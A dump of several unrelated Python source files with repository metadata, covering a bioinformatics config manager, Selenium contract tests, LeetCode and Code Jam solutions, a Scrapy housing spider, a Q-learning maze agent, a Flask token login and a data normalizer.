self._config["run_ratt"] = hasattr(self, "ratt_reference") and self.ratt_reference is not None
if self._config["run_ratt"]:
if not exists(self.ratt_reference):
raise ValueError("Invalid ratt reference location: " + self.ratt_reference)
self._config["ratt_reference"] = self.ratt_reference
if hasattr(self, "make_ratt_data_tarballs"):
self._config["make_ratt_data_tarballs"] = self.make_ratt_data_tarballs
def __init__(self, ap_args):
self.alt_hpc_config_warning = "Please run bginit or provide a valid HPC configuration file with --hpc_config."
self.alt_config_warning = "Please run bginit or provide a valid configuration file with --bgrrl_config/--config."
self.alt_multiqc_config_warning = "Please run bginit to obtain a valid MultiQC configuration file template."
super(BGRRLConfigurationManager, self).__init__(ap_args)
self.__manage()
def create_qaa_args(self, stage="init"):
from qaa.qaa_args import QAA_ArgumentsAdapter as QAA_Args
from .qaa_helpers import STAGE_QAA_ARGS
qaa_args = QAA_Args(**STAGE_QAA_ARGS["init"])
qaa_args.update(
quast_mincontiglen=1000,
project_prefix=self.project_prefix,
config=self.config_file,
hpc_config=self.hpc_config_file,
multiqc_config=self.multiqc_config_file,
normalized=not self.no_normalization if hasattr(self, "no_normalization") else True,
multiqc_dir=join(self.report_dir, "multiqc", stage.split(",")[0])
)
if not stage == "init":
qaa_args.update(**vars(self))
if stage == "asm,ann":
qaa_args.update(**STAGE_QAA_ARGS["asm"])
qaa_args.update(**{
"qaa_mode": "genome,transcriptome,proteome",
"runmode": "asm,ann"
})
else:
try:
qaa_args.update(**STAGE_QAA_ARGS[stage])
except:
raise ValueError("Invalid stage '{}' in BCM::create_qaa_args().".format(stage))
return qaa_args
| UTF-8 | Python | false | false | 8,823 | py | 39 | bgrrl_config.py | 26 | 0.672451 | 0.671657 | 0 | 276 | 30.945652 | 115 |
gchen-aa/webdriver | 14,267,881,373,432 | 9321be3a635454f55a4ac123f3dbf1423242bf3d | 9376cc79f283833d7e20b4a1ef11624945920965 | /tests/qa/cases/intelligence/data_availablity/test_audience_users.py | 692520dcd37b0dade241fa41a7dd37cea9215fad | []
| no_license | https://github.com/gchen-aa/webdriver | a9a32fcda82ded537db00f76b028012af637a667 | ab23848ee613e82e91b117b7b95d7a46cdc48e31 | refs/heads/master | 2017-10-07T15:08:30.289207 | 2017-02-13T00:25:52 | 2017-02-13T00:25:52 | 81,275,678 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Copyright (c) 2016 App Annie Inc. All rights reserved.
from tests.qa.base import BaseSeleniumTestCase
from tests.qa.cases.intelligence.data_availablity.utility import ContractAvailabilityMixin
from tests.qa.constants.constants import Devices, RELATED_APPS_SUPPORTED_COUNTRIES
from tests.qa.pages.intelligence.data_avaliability import DataAvailabilityPage
from tests.qa.utils import logger
from tests.qa.utils.basic_utils import get_list_intersection
from tests.qa.utils.datetime_utils import get_max_datetime
from tests.qa.utils.product_utils import get_market_from_device, find_ids_by_stores
from tests.qa.utils.user_utils import get_contract_by_email_device
class AudienceAvailabilityChecker(BaseSeleniumTestCase, ContractAvailabilityMixin):
def _get_delivery_frequency(self, has_web_reports, has_api, has_file_reports):
deliver_method = self._get_summary_delivery_method(has_web_reports, has_api, has_file_reports)
return [''.join([item, ' - Monthly']) if item in ('Web', 'File Reports') else item for item in deliver_method]
def _get_summary_other(self, report_types, countries, categories):
return [
' '.join([str(len(self.filter_audience_report_type(report_types))), 'Data Set' if len(
self.filter_audience_report_type(report_types)) <= 1 else 'Data Sets']),
' '.join([str(len(countries)), 'Country' if len(countries) <= 1 else 'Countries']),
' '.join([str(len(categories)), 'Category' if len(categories) <= 1 else 'Categories']),
]
def _compose_expect_contract(self, user, device, filters=None, start_date=None, end_date=None):
result = {}
contract_info = get_contract_by_email_device(user, device, filters)
result['Estimation Period'] = self._get_estimation_periods(contract_info['estimation_period'])
result['Categories'] = contract_info['category']
result['name'] = ' '.join(
['Audience -', Devices.get_description(contract_info['device']),
self._get_package_type(contract_info['package_type_id'])])
result['summary_delivery_method'] = self._get_summary_delivery_method(
contract_info['has_web_reports'], contract_info['has_api'], contract_info['has_file_reports'])
countries = get_list_intersection(
contract_info['country'], find_ids_by_stores(RELATED_APPS_SUPPORTED_COUNTRIES, device))
result['Countries'] = countries
result['Data Sets'] = self.fix_data_sets(contract_info['report_type'])
result['Delivery'] = self._get_delivery_frequency(
contract_info['has_web_reports'], contract_info['has_api'], contract_info['has_file_reports'])
start_date = start_date if start_date else get_max_datetime(contract_info['start_date'], '2013-01-01')
end_date = end_date if end_date else contract_info['end_date']
result['summary_period'] = self._get_summary_period(start_date, end_date)
result['summary_other'] = self._get_summary_other(
contract_info['report_type'], countries, contract_info['category'])
market = get_market_from_device(contract_info['device'])
result['Market'] = self.get_market_text(contract_info, market)
result['Methodology'] = self._get_methodology_method(contract_info['usage_methodologies'])
return result
def _check_audience_contracts(self, user, expect_contracts):
page = DataAvailabilityPage(self.selenium).prepare_data_availability_page(user)
actual_contracts = page.get_all_contracts_info()
for actual_contract, expect_contract in zip(actual_contracts, expect_contracts):
for key, value in actual_contract.iteritems():
logger.debug('key: [{}]'.format(key))
logger.debug('expect value: [{}]'.format(expect_contract[key]))
logger.debug('actual value: [{}]'.format(actual_contract[key]))
if isinstance(value, list):
self.assertEqual(sorted(expect_contract[key]), sorted(value))
else:
self.assertEqual(expect_contract[key], value)
def c37148_demographics_only_test(self):
user = 'audience_demo@appannie-int.com'
device = Devices.IOS
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37149_related_apps_only_test(self):
user = 'audience_related_apps@appannie-int.com'
device = Devices.IOS
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37150_audience_ep_1month_test(self):
user = 'audience_1month@appannie-int.com'
device = Devices.IOS
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37151_audience_ep_3months_test(self):
user = 'audience_3month@appannie-int.com'
device = Devices.IOS
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37152_audience_country_jp_test(self):
user = 'audience_jp@appannie-int.com'
device = Devices.IOS
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37153_audience_all_country_test(self):
user = 'audience_all_language@appannie-int.com'
expect_contract = self._compose_expect_contract(user, Devices.IOS)
self._check_audience_contracts(user, [expect_contract])
def c37154_audience_category_test(self):
social_user = 'audience_social@appannie-int.com'
social_expect_contract = self._compose_expect_contract(social_user, Devices.ANDROID)
self._check_audience_contracts(social_user, [social_expect_contract])
def c37155_audience_ios_test(self):
user = 'audience_ios@appannie-int.com'
device = Devices.IOS
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37156_audience_gp_test(self):
user = 'audience_gp@appannie-int.com'
device = Devices.ANDROID
expect_contract = self._compose_expect_contract(user, device)
self._check_audience_contracts(user, [expect_contract])
def c37157_audience_no_api_test(self):
user = 'audience_no_api@appannie-int.com'
expect_contract = self._compose_expect_contract(user, Devices.IOS)
self._check_audience_contracts(user, [expect_contract])
def c37158_audience_no_web_test(self):
user = 'audience_no_web@appannie-int.com'
expect_contract = self._compose_expect_contract(user, Devices.IOS)
self._check_audience_contracts(user, [expect_contract])
def c37159_audience_no_file_test(self):
user = 'audience_no_file@appannie-int.com'
expect_contract = self._compose_expect_contract(user, Devices.IOS)
self._check_audience_contracts(user, [expect_contract])
def c37161_audience_2012_06_test(self):
user = 'audience_june@appannie-int.com'
ios_expect_contract = self._compose_expect_contract(user, Devices.IOS)
gp_expect_contract = self._compose_expect_contract(user, Devices.ANDROID)
self._check_audience_contracts(user, [ios_expect_contract, gp_expect_contract])
def c37162_audience_date_combination_test(self):
user = 'audience_date_combination@appannie-int.com'
ios_expect_contract_06 = self._compose_expect_contract(user, Devices.IOS, filters={
"start_date": '2014-06-01'}, start_date='2014-05-01')
ios_expect_contract_05 = self._compose_expect_contract(user, Devices.IOS, filters={
"start_date": '2014-05-01'})
gp_expect_contract_06 = self._compose_expect_contract(user, Devices.ANDROID, filters={
"start_date": '2014-06-01'}, start_date='2014-05-01')
self._check_audience_contracts(user, [ios_expect_contract_06, ios_expect_contract_05, gp_expect_contract_06])
def c37163_audience_half_month_test(self):
user = 'audience_half_month@appannie-int.com'
ios_expect_contract = self._compose_expect_contract(
user, Devices.IOS, start_date='2013-05-01', end_date='2013-06-15')
gp_expect_contract = self._compose_expect_contract(
user, Devices.ANDROID, start_date='2013-05-01', end_date='2013-07-15')
self._check_audience_contracts(user, [gp_expect_contract, ios_expect_contract])
def c37164_audience_api_combination_test(self):
user = 'audience_api_combination@appannie-int.com'
ios_expect_contract_api = self._compose_expect_contract(user, Devices.IOS, filters={"has_api": True})
ios_expect_contract_noapi = self._compose_expect_contract(user, Devices.IOS, filters={"has_api": False})
gp_expect_contract_api = self._compose_expect_contract(user, Devices.ANDROID, filters={"has_api": True})
gp_expect_contract_noapi = self._compose_expect_contract(user, Devices.ANDROID, filters={"has_api": False})
self._check_audience_contracts(user, [
ios_expect_contract_api,
ios_expect_contract_noapi,
gp_expect_contract_api,
gp_expect_contract_noapi])
def c37165_audience_date_category_combination_test(self):
user = 'audience_date_category@appannie-int.com'
ios_expect_contract_06 = self._compose_expect_contract(user, Devices.IOS, filters={
"start_date": '2016-04-01'}, start_date='2016-04-01')
gp_expect_contract_06 = self._compose_expect_contract(user, Devices.ANDROID, filters={
"start_date": '2016-04-01'}, start_date='2016-04-01')
ios_expect_contract_05 = self._compose_expect_contract(user, Devices.IOS, filters={
"start_date": '2016-06-01'}, start_date='2016-04-01')
gp_expect_contract_05 = self._compose_expect_contract(user, Devices.ANDROID, filters={
"start_date": '2016-06-01'}, start_date='2016-04-01')
self._check_audience_contracts(user, [
ios_expect_contract_06,
ios_expect_contract_05,
gp_expect_contract_06,
gp_expect_contract_05])
def c37166_audience_package_type_test(self):
user = 'audience_package_type@appannie-int.com'
expect_contract = self._compose_expect_contract(user, Devices.ANDROID)
self._check_audience_contracts(user, [expect_contract])
def c37167_audience_no_active_test(self):
user = 'audience_no_active@appannie-int.com'
expect_contract = self._compose_expect_contract(user, Devices.ANDROID, start_date='2010-01-01')
self._check_audience_contracts(user, [expect_contract])
| UTF-8 | Python | false | false | 10,888 | py | 812 | test_audience_users.py | 809 | 0.669728 | 0.64291 | 0 | 193 | 55.414508 | 118 |
953250587/leetcode-python | 25,769,823,449 | adbfdfc598381249eb9d7859ebb6d5b0e38b5209 | f71aecb0e91fe877af3ec652c7f6753a1e7b5ccd | /BoldWordsInString_758.py | 701e5b8be739a6917f319137f5f1f9e985bc404b | []
| no_license | https://github.com/953250587/leetcode-python | 036ad83154bf1fce130d41220cf2267856c7770d | 679a2b246b8b6bb7fc55ed1c8096d3047d6d4461 | refs/heads/master | 2020-04-29T12:01:47.084644 | 2019-03-29T15:50:45 | 2019-03-29T15:50:45 | 176,122,880 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Given a set of keywords words and a string S, make all appearances of all keywords in S bold. Any letters between <b> and </b> tags become bold.
The returned string should use the least number of tags possible, and of course the tags should form a valid combination.
For example, given that words = ["ab", "bc"] and S = "aabcd", we should return "a<b>abc</b>d". Note that returning "a<b>a<b>b</b>c</b>d" would use more tags, so it is incorrect.
Note:
words has length in range [0, 50].
words[i] has length in range [1, 10].
S has length in range [0, 500].
All characters in words[i] and S are lowercase letters.
"""
import numpy as np
class Solution(object):
def boldWords(self, words, S):
"""
:type words: List[str]
:type S: str
:rtype: str
"""
words = set(words)
l = len(S)
dp = [[False] * l for _ in range(l)]
for i in range(l):
for j in range(i, l):
# print(S[i: j + 1])
if S[i: j + 1] in words:
dp[i][j] = True
print(np.array(dp))
a = []
for i in range(l):
for j in range(l - 1, -1, -1):
if dp[i][j]:
a.append([i, j])
break
if a == []:
return S
start = a[0][0]
end = a[0][1]
result = []
for i in a[1:]:
if i[0] <= end + 1:
end = max(end, i[1])
else:
result.append([start, end])
start = i[0]
end = i[1]
result.append([start, end])
print(result)
ans = ''
start = 0
for i in result:
ans += S[start:i[0]] + '<b>' + S[i[0]:i[1] + 1] + '</b>'
start = i[1] + 1
ans += S[start:]
return ans
def boldWords_1(self, words, S):
"""
:type words: List[str]
:type S: str
:rtype: str
55ms
"""
n = len(S)
b = [False] * n
for w in words:
t = S.find(w)
l = len(w)
while t > -1:
for i in range(t, t + l):
b[i] = True
t = S.find(w, t + 1)
ans = ''
i = 0
while i < n:
if b[i]:
ans += r'<b>'
while i < n and b[i]:
ans += S[i]
i += 1
ans += r'</b>'
else:
ans += S[i]
i += 1
return ans
print(Solution().boldWords_1(words = ["ab", "bc"], S = "aabcd"))
# print(Solution().boldWords(["b","dee","a","ee","c"], "cebcecceab"))
# print(Solution().boldWords(["be","ba","ab","ba","adb"], "aaaadedcea")) | UTF-8 | Python | false | false | 2,794 | py | 439 | BoldWordsInString_758.py | 439 | 0.425555 | 0.41088 | 0 | 95 | 28.421053 | 177 |
ges0531/TIL | 2,310,692,453,161 | 4769ce08b0a627c4447776415d71ebf125c73c27 | ad054cebf4198f25d6ca9b37b0eef4783762ac04 | /Algorithm/개념정리/순열/순열, 조합, 부분집합/부분집합.py | bd0b67c0fb1b40cafbf9e89a77be2ae913c63327 | []
| no_license | https://github.com/ges0531/TIL | 4888d0bde5f84ad80caac63ffecf247d22daa0bf | 54389b30e0a67f9c9a3329b1b59c43cdbb33a62c | refs/heads/master | 2023-01-10T23:51:37.409124 | 2020-08-01T07:42:23 | 2020-08-01T07:42:23 | 195,916,245 | 0 | 0 | null | false | 2023-01-05T01:18:07 | 2019-07-09T02:17:43 | 2020-08-01T07:42:32 | 2023-01-05T01:18:05 | 36,278 | 0 | 0 | 89 | Python | false | false | import sys
sys.stdin = open('input.txt', 'r')
def power_set(k, N, arr, t):
if k == N:
print(t)
else:
t[k] = arr[k]
power_set(k+1, N, arr, t)
t[k] = 0
power_set(k + 1, N, arr, t)
num_list = list(map(int, input().split()))
N = len(num_list)
t = [0]*N
power_set(0, N, num_list, t) | UTF-8 | Python | false | false | 328 | py | 492 | 부분집합.py | 421 | 0.484756 | 0.469512 | 0 | 17 | 18.352941 | 42 |
thomascherickal/SofaStatistics | 10,118,942,956,078 | 107455a6cf975adc130b0901c68a1134cf43e02a | bf71eb82d374f23277305decdc7983861e91eda8 | /sofastats/tree.py | 844acc54948e5601e31d476230c9fd205927d4f4 | []
| no_license | https://github.com/thomascherickal/SofaStatistics | 7bbfd6dda7225c67cf7fde8d25ff7b3ab3dab561 | 71a353ff0f32214bb984880f4671e08fb8753920 | refs/heads/master | 2020-06-07T08:17:10.515444 | 2019-06-16T00:19:53 | 2019-06-16T00:19:53 | 192,967,592 | 1 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from . import my_exceptions
class Nodes:
"""
Nodes functionality used by Nodes and Trees
"""
def add_child(self, child_node):
"""
Add child node. Set level, and parent of node.
Returns child node
"""
if isinstance(self, NodeTree):
start_node = self.root_node
else:
start_node = self
child_node.level = start_node.level + 1
child_node.parent = start_node
start_node.children.append(child_node)
return child_node
def get_depth(self):
"Get tree depth (including root node)"
if isinstance(self, NodeTree):
start_node = self.root_node
else:
start_node = self
max_depth = 1 ## initialise
for child_node in start_node.children:
child_depth = child_node.get_depth()
if (child_depth + 1) > max_depth:
max_depth = child_depth + 1
return max_depth
def get_terminal_nodes(self):
"Gets list of terminal nodes"
if isinstance(self, NodeTree):
if not self.root_node.children:
raise my_exceptions.NoNodes
start_node = self.root_node
else:
start_node = self
if not start_node.children:
return [start_node]
else:
term_nodes_lst = []
children_term_nodes = [
child_node.get_terminal_nodes()
for child_node in start_node.children]
for child_term_nodes in children_term_nodes:
term_nodes_lst += child_term_nodes
return term_nodes_lst
def gener_node(self):
yield self
for child_node in self.children:
for node in child_node.gener_node():
yield node
class NodeTree(Nodes):
"""
Object names follow standard tree data structure terminology of root, nodes,
subtrees, terminal nodes, parent, child, sibling, and tree depth.
Nodes can only have one parent. All nodes come from root.
"""
def __init__(self):
self.root_node = Node(label='Root')
self.root_node.level = 0
def print_children(self, node):
l = []
for child_node in node.children:
l.append(str(child_node))
children_str = str(self.print_children(child_node))
if children_str: ## otherwise an empty string will get own line
l.append(str(self.print_children(child_node)))
return '\n'.join(l)
def __str__(self):
l = []
l.append(str(self.root_node))
l.append(self.print_children(self.root_node))
return '\n'.join(l)
class Node(Nodes):
"""
Optionally, has details (a dictionary) and a text label.
Node index is set when added to either a tree or an existing node.
Parent is set when added to a node (or left as None if added to a tree).
Children is updated as children are added.
"""
def __init__(self, dets_dic=None, label=''):
if dets_dic:
self.dets_dic = dets_dic
else:
self.dets_dic = {}
self.level = None
self.parent = None
self.children=[]
self.label = label
def __str__(self):
return (self.level*2*' '
+ f'Level: {self.level}; Label: {self.label}'
+ f'; Details: {self.dets_dic}; Child labels: '
+ ', '.join([x.label for x in self.children]))
| UTF-8 | Python | false | false | 3,621 | py | 129 | tree.py | 83 | 0.537421 | 0.535764 | 0 | 114 | 29.763158 | 80 |
SoluMilken/algo_zoo | 9,586,367,055,083 | b978ac3650db19812d6a968f02ec9ef79c12a1f6 | 7509f42b3df460d95d19cb80a3d490600312064f | /codejam2020/round1a/p2.py | fad9e1b952411dd2986196370aa0ae84aba70063 | []
| no_license | https://github.com/SoluMilken/algo_zoo | 4ed5808c67f37ec083f6ee43d2e5932c10cf4a43 | 1ad76a0da6cfb60b27e5eb121ab5f79cf8b0fee3 | refs/heads/master | 2023-07-25T14:46:20.406426 | 2021-09-02T13:20:07 | 2021-09-02T13:20:07 | 402,423,807 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import math
def p2(n):
if n == 1:
return [(1, 1)]
if n <= 1000:
r = 1
k = 1
output_steps = [(1, 1)]
visited = {(1, 1): 1}
cum_score = 1
else:
r, k, output_steps, visited, cum_score = init2(n)
print(r, k, output_steps, visited, cum_score)
if cum_score == n:
return output_steps
output = recur(
r=r,
k=k,
output_steps=output_steps,
visited=visited,
cum_score=cum_score,
target=n,
)
return output
def init1(n):
'''
r
k
output_steps
visited
cum_score
COMB
'''
# n ~ = 2^k - 1
f = math.log(n + 1, 2)
layer_floor = math.floor(f)
layer_ceil = math.ceil(f)
# get r, k
if layer_floor == layer_ceil:
r = layer_floor # no need next step
if layer_floor % 2 == 1:
k = r
else:
k = 1
else:
r = layer_floor + 1 # need next step
if r % 2 == 1:
k = 1
else:
k = r
output_steps = []
visited = {}
for i in range(1, layer_floor + 1):
# print(i)
if i % 2 == 1:
columns = range(1, i + 1)
else:
columns = range(i, 0, -1)
for j in columns:
output_steps.append((i, j))
visited[(i, j)] = 1
get_score(i, j)
# for next step
if layer_floor != layer_ceil:
output_steps.append((r, k))
visited[(r, k)] = 1
# cum score
cum_score = 2**layer_floor - 1
if layer_floor != layer_ceil:
cum_score += 1
# print(r, k, output_steps, visited, cum_score)
return r, k, output_steps, visited, cum_score
def init2(n):
'''
r
k
output_steps
visited
cum_score
'''
half_n = int(n * (2/ 3))
output_steps = []
visited = {}
for i in range(MAX_STEPS):
if half_n > CUM_MAX_VALUE_IN_LAYER[i]:
x = i + 1
y = math.ceil((i+1) / 2)
output_steps.append((x, y))
visited[(x, y)] = 1
cum_score = CUM_MAX_VALUE_IN_LAYER[i]
r = x
k = y
else:
break
# print(r, k, output_steps, visited, cum_score)
return r, k, output_steps, visited, cum_score
def recur(r, k, output_steps, visited, cum_score, target):
# print(r, k, output_steps, cum_score)
if len(output_steps) >= 500:
print(output_steps)
return
next_steps = get_next_steps(r, k)
for next_step in next_steps:
if next_step not in visited:
score = get_score(next_step[0], next_step[1])
# print("outside, {} {} {}".format(next_step[0], next_step[1], score))
current_cum_score = cum_score + score
if current_cum_score == target:
output_steps.append(next_step)
return output_steps
if current_cum_score <= target:
output_steps.append(next_step)
visited[next_step] = 1
output = recur(
r=next_step[0],
k=next_step[1],
output_steps=output_steps,
visited=visited,
cum_score=current_cum_score,
target=target,
)
if output is not None:
return output
output_steps.pop(-1)
visited.pop(next_step)
return
def get_next_steps(r, k):
# (ri - 1, ki - 1), (ri - 1, ki), (ri, ki - 1), (ri, ki + 1), (ri + 1, ki), (ri + 1, ki + 1).
output_steps = set()
for x, y in [(r - 1, k - 1), (r - 1, k), (r, k - 1),
(r, k + 1), (r + 1, k), (r + 1, k + 1)]:
if (x > 0) and (y <= x) and (y > 0):
output_steps.add((x, y))
return output_steps
def get_score(row, kth):
# print(row, kth, COMB[row][kth])
row_ind = row - 1
kth_ind = kth - 1
# print(row, kth, COMB[row][kth])
if COMB[row_ind][kth_ind] > 0:
# print(row, kth, COMB[row_ind][kth_ind])
return COMB[row_ind][kth_ind]
if kth - 1 < 0:
score = get_score(row - 1, kth)
else:
score = get_score(row - 1, kth - 1) + get_score(row - 1, kth)
COMB[row_ind][kth_ind] = score
# print(row, kth, score)
# print(row, kth, COMB[row_ind][kth_ind])
return score
def get_combination_number(n, k):
# C(n, k)
k = min(k, n - k)
up = 1
down = 1
for v in range(n, n - k, -1):
up *= v
for v in range(1, k + 1):
down *= v
return up / down
if __name__ == '__main__':
MAX_STEPS = 500
MAX_VALUE_IN_LAYER = [0 for _ in range(MAX_STEPS)]
CUM_MAX_VALUE_IN_LAYER = [0 for _ in range(MAX_STEPS)]
for i in range(1, MAX_STEPS + 1):
k = math.ceil(i / 2)
MAX_VALUE_IN_LAYER[i - 1] = get_combination_number(i - 1, k - 1)
CUM_MAX_VALUE_IN_LAYER[i - 1] = CUM_MAX_VALUE_IN_LAYER[i - 2] + MAX_VALUE_IN_LAYER[i - 1]
COMB[i - 1][k - 1] = MAX_VALUE_IN_LAYER[i - 1]
if CUM_MAX_VALUE_IN_LAYER[i - 1] > 1e+9:
break
COMB = []
for i in range(MAX_STEPS):
row = [0 for _ in range(i + 1)]
row[0] = 1
row[i] = 1
COMB.append(row)
FLAG = False
t = int(input())
for case_i in range(1, t + 1):
n = int(input())
steps = p2(n)
print("Case #{}:".format(case_i))
for step in steps:
print("{} {}".format(step[0], step[1]))
| UTF-8 | Python | false | false | 5,554 | py | 80 | p2.py | 76 | 0.466331 | 0.444364 | 0 | 232 | 22.939655 | 98 |
batulu12/ljscrapy | 15,307,263,467,061 | dd93af2710f54a021a1b3770f3f169222d14f620 | 19197d0ad1640144f1d6ddd068d63372b2222ad4 | /lj/spiders/spider.py | 42ff8c864759dd578f47bf1cc759b1de929aba6a | []
| no_license | https://github.com/batulu12/ljscrapy | c3ae3640f3f084388db622d7e16c99255f1276d8 | 282c98d9e5a1de0abf7aa4d0e6573d9659695f85 | refs/heads/master | 2021-01-23T07:20:55.992793 | 2014-11-06T07:38:31 | 2014-11-06T07:38:31 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from scrapy.contrib.spiders import CrawlSpider,Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.selector import HtmlXPathSelector
from lj.items import LjItem
class lj(CrawlSpider):
name = "lj"
allowed_domains = ["beijing.homelink.com.cn"]
start_urls = ["http://beijing.homelink.com.cn/ershoufang/BJHD86983254.shtml",
"http://beijing.homelink.com.cn/ershoufang/pg2"]
rules = [Rule(SgmlLinkExtractor(allow=('/ershoufang/[^/]+.shtml')), callback = 'myparse'),
Rule(SgmlLinkExtractor(allow=('/ershoufang/pg[^/]', )), follow=True)]
def myparse(self, response):
item = LjItem()
x = HtmlXPathSelector(response)
item['url'] = response.url
strlist = x.xpath('//h1/text()').extract()
if len(strlist) > 0:
item['title'] = strlist[0]
else:
item['title'] = 'hello'
strlist = x.xpath("//div[contains(@class,'public nav')]/a/text()").extract()
if len(strlist) > 0:
item['region'] = strlist[2]
else:
item['region'] = 'region'
if len(strlist) > 0:
item['detail_region'] = strlist[3]
else:
item['detail_region'] = 'detail_region'
if len(strlist) > 0:
item['community'] = strlist[4]
else:
item['community'] = 'community'
strlist = x.xpath("//div[@class='shoujia']/ul/li/span/text()").extract()
if len(strlist) > 0:
item['price'] = strlist[0]
strlist = x.xpath("//div[@class='shoujia']/ul/li/div[@class='reduce']/div[@class='prompt']/text()").extract()
if len(strlist) > 0:
item['trend'] = strlist[0]
strlist = x.xpath("//div[@class='shoujia']/ul/li[4]/text()").extract()
if len(strlist) > 0:
item['builtarea'] = strlist[0]
return item | UTF-8 | Python | false | false | 2,021 | py | 10 | spider.py | 8 | 0.532905 | 0.520534 | 0 | 54 | 36.444444 | 117 |
anandxkumar/Maze_Solver_Using_Reinforcement_Learning | 10,316,511,463,361 | 7290e21d0f694d25e1939238fb4c6379c9b77dd3 | c4b3daa749b7d06e943c08a2e7b2fd509c831e21 | /app.py | 7f007948045d7ef85a41dad7f5c8fdc162bfa319 | []
| no_license | https://github.com/anandxkumar/Maze_Solver_Using_Reinforcement_Learning | 0c56a453377cade088fc9d18e35a565622ba3007 | 21f87066d932a62e487d18c011d005dcd2b2c178 | refs/heads/master | 2022-07-10T11:51:31.684891 | 2020-05-09T20:27:56 | 2020-05-09T20:27:56 | 262,653,231 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # Interaction between agent and environment
from maze_env import Maze
from RL_agent import QlearningTable
import matplotlib
# Backend
matplotlib.use("TkAgg")
import matplotlib.pyplot as plt
episode_count = 100 # number of epochs
episodes = range(episode_count)
rewards = [] # The gained reward in each episode
movements = [] # Number of movements happened in each episode
def run_exp():
for episode in episodes:
print ("Episode {}/{}".format(episode+1, episode_count))
observation = env.reset()
moves = 0
while True :
env.render()
# Q-learning chooses action based on observation
# we convert observation to str since we want to use them as index for our DataFrame.
action = q_learning_agent.choose_action(str(observation))
# RL takes action and gets next observation and reward
observation_, reward, done = env.get_state_reward(action)
moves += 1
# RL learn from the above transition,
# Update the Q value for the given tuple
q_learning_agent.learn(str(observation), action, reward, str(observation_))
observation = observation_
if done:
movements.append(moves)
rewards.append(reward)
print("Reward : {} , Moves : {}".format(reward,moves))
break
print(" Game Over")
plot_reward_movements()
def plot_reward_movements():
plt.figure()
plt.subplot(2,1,1) # Number of rows, columns, index
#episodes = np.asarray(episodes)
#movements = np.asarray(movements)
plt.plot(episodes, movements)
plt.xlabel("Episode")
plt.ylabel("Movements")
plt.subplot(2,1,2)
plt.step(episodes,rewards)
plt.xlabel("Episode")
plt.ylabel("Reward")
plt.savefig("reward_movement_qlearning,png")
plt.show()
if __name__ == '__main__':
env = Maze()
q_learning_agent = QlearningTable(actions = list(range(env.no_action)))
# Call run_experiment() function once after given time in milliseconds.
env.window.after(10, run_exp)
env.window.mainloop()
| UTF-8 | Python | false | false | 2,385 | py | 3 | app.py | 3 | 0.57065 | 0.56478 | 0 | 75 | 29.773333 | 97 |
selahaddint/PythonLoginAPI | 9,878,424,808,875 | a6c20464bc936801a47ecc5d3a631e6a04d10bc0 | d9ce762e4aca275fbc7b281e3a561a9bb4e53ee4 | /Persistence/LoginPersistence.py | ff23cda4188a50e1c4c9fb2d6d4a6921b0476f8c | []
| no_license | https://github.com/selahaddint/PythonLoginAPI | 0b16bc417280cbdc22fe2f6dd287d42cb4e401f7 | e3bf5443253786cf295abe5a1f9c5ffec43d692b | refs/heads/master | 2020-12-24T21:28:17.926566 | 2017-06-05T11:15:14 | 2017-06-05T11:15:14 | 59,067,687 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from initialize import *
from Models.UserModel import *
import json
#---------------------------------------------------------------------------------------------------------------
class LoginPersistence():
def Login(self,user_name, password):
user = User.verify_auth_token(user_name)
if not user:
user = User.query.filter_by(Username=user_name).first()
if not user or not user.verify_password(password):
return json.dumps({'status':'NO'})
g.user = user
token = g.user.generate_auth_token(600)
return jsonify({'status':'OK', 'token': token.decode('ascii'), 'duration': 600})
def Token():
token = g.user.generate_auth_token(600)
return jsonify({'token': token.decode('ascii'), 'duration': 600})
#---------------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------------
#---------------------------------------------------------------------------------------------------------------
#--------------------------------------------------------------------------------------------------------------- | UTF-8 | Python | false | false | 1,303 | py | 11 | LoginPersistence.py | 9 | 0.325403 | 0.316193 | 0 | 22 | 58.272727 | 112 |
fabiankirsch/mastersthesis | 11,330,123,752,478 | 2268ec47385dd5f8c68a36ec57363a0a9ed2e7f1 | 139a1c56ae919c66a9a45108df0def5d12a51b83 | /code/normalizer.py | 0f7606641361ab2b67e6383513851eb11299ab66 | []
| no_license | https://github.com/fabiankirsch/mastersthesis | d5fb38cc065e01c19de204ac6621a69d6f2f963d | 8325da74189ab90089277e209490ab46dfef0324 | refs/heads/master | 2020-07-28T09:38:29.372542 | 2019-09-18T19:08:12 | 2019-09-18T19:08:12 | 209,382,892 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import numpy as np
from sklearn.preprocessing import StandardScaler
def fit_standard_scaler_to_sequence_batch(X):
"""
X: 3d array containing sequences
Returns 2 arrays of means and variances
"""
X_2d = X.reshape(-1, X.shape[2])
scaler = StandardScaler().fit(X_2d)
return scaler.mean_, scaler.var_
def normalize_sequence_batch(X, means, variances):
"""
X: multivariate sequence batch (numpy 3d array)
means: array of means, one for each column. Used to for normalization
variances: array of variances, one for each column. Used for normalization
Applying normalization function on third axis of array (index 2).
Returns normalized sequence batch
"""
return np.apply_along_axis(normalize_single_observation, 2, X, means, variances)
def normalize_single_observation(X, means, variances):
return (X - means) / np.sqrt(variances)
def normalize_sequence(X, means, variances):
"""
X: single multivariate sequence (2d numpy array)
means: array of means, one for each column. Used to for normalization
variances: array of variances, one for each column. Used for normalization
Returns normalized sequence.
"""
return (X - means) / np.sqrt(variances)
| UTF-8 | Python | false | false | 1,245 | py | 67 | normalizer.py | 16 | 0.706024 | 0.697992 | 0 | 41 | 29.365854 | 84 |
